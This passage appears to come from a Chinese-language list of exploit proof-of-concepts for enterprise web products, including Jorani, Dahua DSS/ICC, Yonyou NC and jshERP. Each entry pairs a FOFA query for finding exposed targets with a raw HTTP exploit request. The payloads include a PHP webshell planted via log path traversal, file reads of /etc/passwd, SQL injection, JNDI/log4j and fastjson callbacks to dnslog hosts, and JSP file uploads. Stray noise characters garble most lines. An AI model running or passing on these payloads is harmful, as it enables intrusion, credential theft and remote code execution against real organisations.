Cache-Control: no-cache* y4 P- t- {5 a- V, g0 j; k
Upgrade-Insecure-Requests: 1! J9 X# o7 S( L' c6 h+ a9 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" R2 f3 [/ H |. q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* B) z. A* G- l( b" G. j" t
Accept-Encoding: gzip, deflate; [8 i t& j5 z: ?. d7 u J
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
1 Q3 H$ T3 p: ?% p' n! |6 _Connection: close; h7 x: q& t) ?
2 Y# f' v6 Y5 q H! J- b$ `
' Z2 @, @; e+ N4 N& s12. Jorani < 1.0.2 远程命令执行9 C, |2 l* J/ d0 M
FOFA:title="Jorani"
' _ T$ P a; V第一步先拿到cookie! z$ B" p. G1 C; Z( o8 d
GET /session/login HTTP/1.1
1 d% Q; g" _# J3 n5 V+ mHost: 192.168.190.30+ H( X5 `+ C$ n, c( n/ q! s
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36! q( l0 l% \, T0 ^
Connection: close' u) |, Z9 ?: I$ z, |% i
Accept-Encoding: gzip- W" G# W( g) y" f! x( I# N7 z
3 X/ ]; z4 `; }
, Z' F7 A$ K- S6 @/ N
响应中csrf_cookie_jorani用于后续请求3 G1 G; n# B% X% \' ~
HTTP/1.1 200 OK9 a# i! F9 a( }+ g) I( R9 u
Connection: close$ I) E7 \/ m- _* \$ x! c
Cache-Control: no-store, no-cache, must-revalidate
9 Q @ l1 h8 w' qContent-Type: text/html; charset=UTF-8
3 g, X' `* g* PDate: Tue, 24 Oct 2023 09:34:28 GMT/ _* J/ j# J, H5 O6 k% o
Expires: Thu, 19 Nov 1981 08:52:00 GMT
! g: @( G' ]% o( z3 K/ C3 F/ Q7 ZLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT7 R- z% s* G- Y& b
Pragma: no-cache
8 r3 p2 S. V ~1 Y5 sServer: Apache/2.4.54 (Debian)
) [' W0 D/ I; ?9 ESet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
` N5 Q4 w2 a1 Q# h9 _# E r9 KSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly" j- ]+ u% ` @1 T
Vary: Accept-Encoding
+ h+ @/ a. N3 q; ]+ N" ?& I
+ {3 y. O' F: U' a$ e$ j: P) t$ |6 @) a: J
POST请求,执行函数并进行base64编码
! n8 y1 w0 g$ `& U- N& y' F8 R8 XPOST /session/login HTTP/1.1
2 L2 B+ j- B; k- S. |Host: 192.168.190.30; K: n5 W' m5 W1 l) X/ U0 W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
7 b# r, ~, b* r: N1 i- @+ f- LConnection: close+ b) F+ q% f+ G' H4 Q
Content-Length: 252 Q1 F) e, A2 R2 Q
Content-Type: application/x-www-form-urlencoded
( `0 g$ V1 N) i8 Q. S& O( ]9 xCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
+ u. G/ m! I1 N" V: N8 k' ?) R% ^7 X& V" PAccept-Encoding: gzip
. I7 H. o7 c, U9 @9 C4 h- [1 a4 Z+ r/ Z/ H6 q" H- q: V
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor, [$ A, x) |+ e8 J' L/ D: k: H3 n
- ^' v1 j; ^& P+ `" j( B
9 B& \% U: s# y; j# [$ Q- A D% W$ O5 h! V
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
6 y6 W$ |. w/ F4 m: M3 ~GET /pages/view/log-2023-10-24 HTTP/1.1, ]+ c5 S, C% v3 ]
Host: 192.168.190.30
% g& {5 E! j h5 Y) R7 J3 Z ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* f$ V5 |4 l, y* h8 N% H' v7 _
Connection: close' g4 A' ?3 D) a4 h" Z
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
2 w% f# X2 `9 }! W- q6 |K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=3 z! }, Y; f, \: f- N$ ]- a8 e
X-REQUESTED-WITH: XMLHttpRequest
4 k7 o. o) r2 n! F" mAccept-Encoding: gzip
1 K: \/ s( F; A1 w# a/ q
3 K. t. G4 ~& `7 t5 e, @/ j) g4 U$ {3 Z- F# A$ L( {8 m0 d
13. 红帆iOffice ioFileDown任意文件读取
C7 |# x$ ?4 w9 q& w9 E8 ?FOFA:app="红帆-ioffice", d' L0 V( R7 \0 o8 s! n
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.12 x2 [; O, q6 G0 N
Host: x.x.x.x
: ] E2 H' m" M) E4 Y9 ]User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
x7 x1 }7 m' `" l2 A6 d' ?Connection: close" ~7 u d: s& J9 f9 M U( l' C
Accept: */*7 x9 e7 N9 X4 e3 y
Accept-Encoding: gzip
& E) A* `$ ^) `8 ]3 l5 F6 Y
2 i4 S' x$ {! ~! u! C3 ~
% p+ w0 y: C1 T/ R/ s" u# @) C' n4 W14. 华夏ERP(jshERP)敏感信息泄露3 Y4 @; z9 u( H/ y, G7 w5 o' J4 k
FOFA:body="jshERP-boot"5 `2 ~, o+ G1 G5 ~9 x1 [- O
泄露内容包括用户名密码2 v9 a" R2 J: [+ Z
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1) x! b8 ~3 \% \, I
Host: x.x.x.x$ @% u- d2 C$ l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
% y7 J2 F/ F t# UConnection: close
- h C2 }5 q" C2 aAccept: */*
( D0 O7 R0 Q% t rAccept-Language: en
* _" [ L7 F. {+ j! z$ P7 j$ v: k" nAccept-Encoding: gzip
" F: `% T+ p: _( d1 k0 C
, Z6 G8 ?' n- B5 T( G3 R. B
1 D4 c& a: [; u Y9 u. z- }15. 华夏ERP getAllList信息泄露
( r) j4 k) V+ }CVE-2024-0490' U. [; G! @% Z: \: b
FOFA:body="jshERP-boot" z+ v1 ~' R/ y# D( }8 y3 H4 r# i
泄露内容包括用户名密码
8 {! A- ?/ U$ z' v2 V4 eGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
7 C. j; W4 p; h. p+ MHost: 192.168.40.130:1002 {' k4 K, t9 u, N' l" X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
" ^8 Q8 c0 N P7 TConnection: close/ q. `- J x3 B; W: E
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
) B* b+ ^1 C- R5 O" `" QAccept-Language: en! @8 x. W, G# L$ R0 W1 d) @
sec-ch-ua-platform: Windows* W4 E, V/ r( J" [
Accept-Encoding: gzip" b. F9 d% i( p2 L8 j3 g7 E
7 k7 D; O# |6 g9 m4 _: h% @& S1 v3 E$ l
16. 红帆HFOffice医微云SQL注入' B3 z# D6 `$ R
FOFA:title="HFOffice") a2 m& G0 f7 x1 P1 x; }# ^/ N
poc中调用函数计算1234的md5值, G4 B/ @' `2 b% l0 W
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1( s e8 h( n7 Z7 h, M9 E, ~' Z
Host: x.x.x.x
+ D3 m8 G% p% u S* GUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
; S" w( R& F# gConnection: close. [: \: V& `: v
Accept: */*
, F' m4 G& n9 E5 |1 i; m* z/ b% HAccept-Language: en
9 H e1 l6 e( ~# f' J+ H$ bAccept-Encoding: gzip
' h: D3 q H* _$ x' Q, J, G: K+ ~5 I4 a y% {% B
2 O. q) O( E' m: b3 Q ~17. 大华 DSS itcBulletin SQL 注入5 K3 |1 v" z D' q9 j% h o. r
FOFA:app="dahua-DSS". M6 [7 {0 |6 |, j: m7 u
POST /portal/services/itcBulletin?wsdl HTTP/1.19 h% P% T' l( H3 A7 Z' i8 E
Host: x.x.x.x4 j, p6 I, C3 y1 c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 ^: q4 J2 Y4 Y |" l+ r1 q
Connection: close5 _. e. z! A" _: A0 D; ?1 X
Content-Length: 345
, H. Z. w5 K$ k$ w, Z# x6 tAccept-Encoding: gzip
8 h, X0 I5 w1 {; C2 s
}, b+ K/ \0 b$ P" D& G<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
6 V' P. q; _- `) T' |* ]# g<s11:Body>7 K! w. D, y/ n" a& x
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>- I: Q5 W4 s4 _# S$ O6 F7 a7 P5 f& r
<netMarkings>6 w4 q( T0 i8 t' O1 T/ M& D
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
1 a1 G$ b0 f. t8 M+ R </netMarkings>
6 D% j0 u. n* Z7 ` </ns1:deleteBulletin>
' J% E C O' J) H </s11:Body>8 s8 g4 O& Y; H
</s11:Envelope>. M7 X; R& o8 f7 F) H) M9 L% S
. V' g7 d5 { w1 A9 F5 ]. }, ^. O A
) ]' R) b7 |& D6 t& h) b3 G0 Y
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露. x# E3 P7 |, Q4 }8 I
FOFA:app="dahua-DSS"
. O$ z( o4 k6 m0 t5 hGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1$ l# v X x% i* d
Host: your-ip
0 V" @' U% R! R! x8 L: j0 D3 k% y$ yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 L$ z+ e8 h8 ?6 K+ N! \5 _) v7 b/ C
Accept-Encoding: gzip, deflate
4 u' X! H9 @& ~5 G0 m* N* |Accept: */*6 A, {" X- J4 c/ c2 a) K
Connection: keep-alive
! V4 _/ o" ~! d- G' F
" ]0 |) P, a+ [4 R! g4 I6 S' a6 y) I/ f5 e7 z# P+ }
0 A, u" k3 d5 Z( o" Z" Z19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
' c( X+ h+ n d/ j; O% KFOFA:app="dahua-DSS"
# K1 w- X7 z5 JGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
; `/ y4 q! [% y/ T7 a* \) z8 EHost:
' D1 A' k, h9 i& H9 x8 g$ O: H8 aUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36( M T; z' z* f x* V
Accept-Encoding: gzip, deflate2 c& C5 B: v) |% A! Z, @
Accept: */*
% i7 _; Q# x, _8 @" l& e( S7 M1 OConnection: keep-alive& {+ u. A, N7 _$ }
0 L7 g4 s( ^ [. }6 t& }' ^% b; ~4 ^0 \6 D; V- w
20. 大华ICC智能物联综合管理平台任意文件读取
) K# \. |* [* H) Y. ]; ZFOFA:body="*客户端会小于800*"
/ E: X. T+ w# \7 d6 h$ o4 s) KGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
% I9 A8 i% ?( G7 g7 f) i8 |- A, hHost: x.x.x.x
( c6 j5 R% @7 q: N5 L0 HUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ w" u2 ~: E5 RConnection: close, r/ i/ P- z! W5 ^7 c0 ^3 \
Accept: */*; ?) G$ Y* L$ A- S# |
Accept-Language: en; I7 D" S! M3 m/ w+ P/ N5 X
Accept-Encoding: gzip6 B6 T6 W! n/ ]- R
6 a. o/ p8 p1 H5 U R! x
7 `* t4 E% v" ]6 a9 e5 K
21. 大华ICC智能物联综合管理平台random远程代码执行2 a& H3 i( @9 y1 U+ k& b ], L0 m
FOFA:icon_hash="-1935899595"+ |# m- J% m0 n3 F8 C' U r
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1( g( r+ t4 o: P& w- C! Z) z+ ~
Host: x.x.x.x
5 M5 M5 W% D% |, _- DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 o( w; v$ Q) s: k/ ZContent-Length: 1615 w. f3 A3 f6 N
Accept-Encoding: gzip
4 b: G* s8 }- E- @Connection: close
( q4 f2 D S1 W+ T. T3 n" b- [ ]Content-Type: application/json;charset=utf-8* d5 Q; x2 j& ^+ q5 ]- {/ U
9 u5 }1 z6 y6 Y{# K% ]( }- {/ [# |/ H& u% T. m% r
"a":{" h, J' J. x; ~4 u3 O
"@type":"com.alibaba.fastjson.JSONObject",
# z* ^! c* J/ q- V* r {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
6 {/ N% _, X8 m! R. L }""7 M7 }# S% s6 C: X
}
* j4 b* p. H7 X+ |; B3 t4 N
: {' \ P5 W1 y1 V8 Z% n$ \) ^9 d
. E2 ~& t1 n% F( W! O! z: p: J% o22. 大华ICC智能物联综合管理平台 log4j远程代码执行
4 O* x0 o; k; m. ~4 W# Z sFOFA:icon_hash="-1935899595"
- f, \7 G$ k" XPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.11 w; d7 Z$ I3 L3 r7 R' n1 S0 c
Host: your-ip; E+ R, V! o" P3 A8 {6 u, X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.363 L. u7 O2 e; M# f5 Z
Content-Type: application/json;charset=utf-80 _; k6 N2 i! h- o2 z# U
6 ?9 w# r+ E% f{
' |1 X4 ~5 U1 j"loginName":"${jndi:ldap://dnslog}", e; C9 r# x/ I8 m d
}
) i6 I0 H- v' V
! S$ _0 b8 g& H' q1 q+ X7 ^
. X* u+ ]& L" g: f Y
; i! J: J, T. K% c0 ]$ Y+ W23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
- s! g' R1 ~& h- _$ P$ R5 ^2 T3 S# pFOFA:icon_hash="-1935899595"
. f, \9 X! Y% x. l" P' jPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1+ Z7 G( t( q' N* r5 c
Host: your-ip
+ v3 Q ~) Y) ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 N G# p/ ^! c
Content-Type: application/json;charset=utf-88 n9 \8 O+ J" p
Accept-Encoding: gzip9 K0 R+ ?4 K3 W$ Y+ q9 W p
Connection: close- k9 p; O+ }( ~. M: x @
4 ~6 ~. b/ G* M* K3 z: i9 g6 O. `8 j{
2 T3 z! { a; d5 s3 g "a":{
7 Q" }; E a, g4 n "@type":"com.alibaba.fastjson.JSONObject",
) @4 ~! {% `8 Q# C4 X4 }% p) b {"@type":"java.net.URL","val":"http://DNSLOG"}
! ]" s' ?- l- p2 y, h9 J }"", ~3 L% e3 r1 u2 l" y$ A
}
# L- S `& f! ~/ U% w! {5 S4 b% Y1 [, H0 {$ F( ~- u; L
. \5 T' N/ V& j1 ^' i24. 用友NC 6.5 accept.jsp任意文件上传" {% U9 `2 J8 B t+ @
FOFA:icon_hash="1085941792"
& U0 E# s/ @( d/ d! h* P) v# BPOST /aim/equipmap/accept.jsp HTTP/1.1
( R4 I2 p" U1 X) C# `$ I3 `; rHost: x.x.x.x
2 I( _8 X, u" aUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36% w1 m9 D* _8 I; o
Connection: close
* Q" W3 |7 D Q) _Content-Length: 449
3 B# ^% C2 q5 c5 t! s( YAccept: */*
) O# o( w9 i6 G( U$ G$ VAccept-Encoding: gzip
2 i6 O6 w/ z3 P3 Y0 u2 W+ y( UContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
: z* T! c% K3 K3 |. n, k+ k' O1 {4 z. C9 z8 Q; }3 c+ j
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc" t+ n5 c ]0 v+ U9 `2 p* D
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
4 i- A; W0 b% A# T8 |9 O4 mContent-Type: text/plain
2 x: d* [9 x, o/ Y8 R& D" j* g
+ C0 H: B- |- F. g" ]; L<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>) M3 {: ?# ~" w9 [! }; `( ?
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc4 F9 i& V& b6 z8 M% o
Content-Disposition: form-data; name="fname"
, c3 b, ^' }, s, k6 M' y* m
/ F( u: S& B: S& s: L i. ^( e\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
9 P* u! @/ l6 {* T" l; U-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--! l) t7 H; H, e
6 w! O1 _1 i( K; X. s, Q+ c T+ h5 [
25. 用友NC registerServlet JNDI 远程代码执行9 J3 \# s7 G) j
FOFA:app="用友-UFIDA-NC"
- A/ U6 p: T9 Q3 u, PPOST /portal/registerServlet HTTP/1.1
@/ E; a& Z" U' j/ ^Host: your-ip+ L/ R" H' p# ^9 z2 `+ x: G& M; ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
3 A& ~. J9 | zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.98 U1 k: y9 V# r3 ?2 P5 Q: C4 E( Q
Accept-Encoding: gzip, deflate. G$ N# R; u8 T
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
) d1 V0 w7 c0 M8 t; zContent-Type: application/x-www-form-urlencoded+ V" s; m% |$ h( W$ n7 y
9 @* i! X. g% N- s3 b
type=1&dsname=ldap://dnslog4 S- T( J" A# A# s v: J1 j
7 A p% [* Z* F6 O7 P5 N# t8 R2 F. Q% \; g9 x. X' Q
) c; i3 ^" Q1 I4 v. g
26. 用友NC linkVoucher SQL注入2 j9 K. w2 a: i" b7 I
FOFA:app="用友-UFIDA-NC"7 O: C- Z' g$ Q- H) O' J( x
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
, ?2 E. f7 e% I/ S" PHost: your-ip
2 | j; x" Q: j% G7 J% J4 L0 Y( \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 j2 [& B2 c* m( n6 U
Content-Type: application/x-www-form-urlencoded
: `$ S& I/ k+ I" sAccept-Encoding: gzip, deflate% p: o7 T! V$ J8 _4 d
Accept: */*
4 c( Q, K! ~8 Y# J w6 e% TConnection: keep-alive" j- s( F2 }, J
) }6 ~' v9 q* }! h1 I$ c. w
1 c; V U- j$ G' b8 p27. 用友 NC showcontent SQL注入
; H5 r- m/ T5 D$ y+ `3 t$ y8 nFOFA:icon_hash="1085941792"
( e8 y! z, {/ s4 D8 iGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
7 n! O! @9 m; _3 d% k# gHost: your-ip; d6 l5 C! {! j/ u$ I3 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: l6 e( Z1 A5 v. H4 JAccept-Encoding: identity, X7 r# P8 k" h$ R" }1 |
Connection: close
m& P2 V0 P" j2 c7 `) U# zContent-Type: text/xml; charset=utf-8
: Z# Y3 g1 R( E( ]( K( e2 o# ~2 b1 s. d, M
( `; a8 [% c C' J( G% j
28. 用友NC grouptemplet 任意文件上传
, ~3 I6 p+ r1 U. s6 uFOFA:icon_hash="1085941792"- I5 Y7 ^! a. L
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1# x/ {6 d$ s2 L8 T2 x9 P' `/ t5 X
Host: x.x.x.x0 T& J @4 ~/ M4 M& Z2 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
$ M- h+ h+ Z( {2 V% e- }' iConnection: close
- p% ^9 Y5 i: O; ]: N' ?0 E! ]Content-Length: 268/ ?3 `5 r4 P- O4 X U. Y+ ]7 u
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk1 v3 o9 z' e: x) i0 }7 o/ G
Accept-Encoding: gzip
$ o8 h/ }7 |6 h6 _
! ^0 [: ]2 P0 e% M) P# ?/ i------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
4 p2 u" D& w9 V& W" W, s* `Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
, K# j- o4 I* u7 {. S% JContent-Type: application/octet-stream# s& \) x; k+ V( h H6 V* T+ U& _6 D4 Q
* P/ g4 F2 R0 O- n
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
/ n6 V9 Y$ p, f( A- n------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--' E/ X, Y; U4 G" r7 u% H& y/ u3 X, m
" \& j7 R$ |) J( o. |( D
' h P0 h9 ]; t) ^2 ~ l/ a7 ~/uapim/static/pages/nc/head.jsp
$ f m+ u* u6 h7 B4 P2 Y5 k0 a3 h' h+ q2 Y- [8 A" w& M2 _6 `9 u
29. 用友NC down/bill SQL注入0 w& _) h6 V( B, W2 {0 a4 s
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"- ^5 A, n( A' l/ L4 c7 _
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
% N7 |- z2 y; v6 b5 rHost: your-ip
& z4 v+ d0 v1 W/ w8 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. q s, v% ^! }& B9 \( ?Content-Type: application/x-www-form-urlencoded7 b* U- S% C% f9 a- n
Accept-Encoding: gzip, deflate0 u2 ~1 j0 m: q7 s8 x3 e
Accept: */*
9 j2 \8 s. `! x# b m5 ?2 QConnection: keep-alive/ C% E, C5 a0 f; J2 t
/ s$ ] C0 Y7 ^& I+ h: d+ ]7 p: v4 f0 V
30. 用友NC importPml SQL注入9 v, q+ z5 H! r% N! V/ O" `( n! E
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
2 M0 g5 G$ {: i3 Y6 VPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
G& x7 Q: ^6 T# `Host: your-ip( t4 R- Y5 k- ~) W1 l
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
9 I' Y Q8 p/ ?% kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
- u8 l0 P: S+ u% w; U. t4 }, UConnection: close6 \( d- s c$ D- _3 Z
' i" E5 l' H! M$ U------WebKitFormBoundaryH970hbttBhoCyj9V
4 y' A" L" }0 iContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
3 w& h3 O9 M4 I$ EContent-Type: image/jpeg) f" C% v, q2 G, P
------WebKitFormBoundaryH970hbttBhoCyj9V--
$ I' T9 Q: w2 V b
) f8 U# f% {( l& l: o$ }. r+ a; t
8 C- ]; {4 E- W6 h: J31. 用友NC runStateServlet SQL注入
, {, {8 o' ^$ D: m; \$ Hversion<=6.5: ^3 x8 w0 S1 e5 ]
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif": t! x% m5 a. z$ x$ ~
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
f* U" l4 _* bHost: host
1 B. p+ H L* ]$ pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
3 |! q+ r" S: j6 {9 b4 KContent-Type: application/x-www-form-urlencoded3 p# H- l3 E4 N8 F1 X5 K! m3 @) y
5 b5 Y' Z. t) x1 E
T9 U* A- J: U( S; ]+ W32. 用友NC complainbilldetail SQL注入4 o( ~7 w/ T0 I# `1 o
version= NC633、NC65
) }5 r+ i* S. V' s. s7 \/ r% oFOFA:app="用友-UFIDA-NC"
( ]+ }# P$ _; |- y$ e& p' ^: ^GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 }# U, H/ i; j: f2 _Host: your-ip+ x) y- {4 G) `5 {( C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. m, K& D' p& r7 f$ w$ P- ?
Content-Type: application/x-www-form-urlencoded
0 ~& Z. ~' y) t7 {. pAccept-Encoding: gzip, deflate4 w* I, z9 r3 |5 t; g+ d3 _
Accept: */*
5 }2 K5 h* N7 i7 @/ P7 }% B, {# p2 `Connection: keep-alive+ q) x0 e, w- @5 H$ z
1 @% F) @8 y% Q" o( D
7 e; C3 Q C/ I+ x, A2 x5 o2 I. E33. 用友NC downTax/download SQL注入
" n* |" y; k4 r5 {/ c- uversion:NC6.5FOFA:app="用友-UFIDA-NC"
! f6 p% d/ I$ z% a" o) d' ^0 _GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1# a+ c1 l* T" k8 l* |
Host: your-ip' V3 s& r/ ^( `* Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 f4 X J6 j& O+ ]9 J9 q$ m
Content-Type: application/x-www-form-urlencoded
$ X4 c6 y' @7 `, N2 T" o; f& ?Accept-Encoding: gzip, deflate# H- D' j# x& s# v
Accept: */*" x" o1 u& L1 }7 }6 U z7 G. \
Connection: keep-alive
: r" g1 ^' U2 K8 A; u+ T9 y' a! X7 l# Q- N: \( X
$ g ~# P# a% k1 o0 ]
34. 用友NC warningDetailInfo接口SQL注入
# }* V9 ]* I# s' RFOFA:app="用友-UFIDA-NC"
" b6 x1 e5 b2 r4 g6 KGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
/ Q- k: i% X. e$ I& Z. h: Q6 o; J; v7 tHost: your-ip
% M6 e1 h6 {! P6 R9 \8 x! lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 K. K) z/ a* N: S; l& c! pContent-Type: application/x-www-form-urlencoded
$ V1 h! E0 o. v, B/ d/ B9 AAccept-Encoding: gzip, deflate' h7 k0 c$ w4 f, h
Accept: */*
) ?& H* i/ _8 [: G; TConnection: keep-alive
! E% `3 x- X& ~. }' r, X8 E. a8 g% A, e: \0 D
! @8 K3 L d6 ] l" }' ~
35. 用友NC-Cloud importhttpscer任意文件上传
- {& M$ m- b$ t C: iFOFA:app="用友-NC-Cloud"
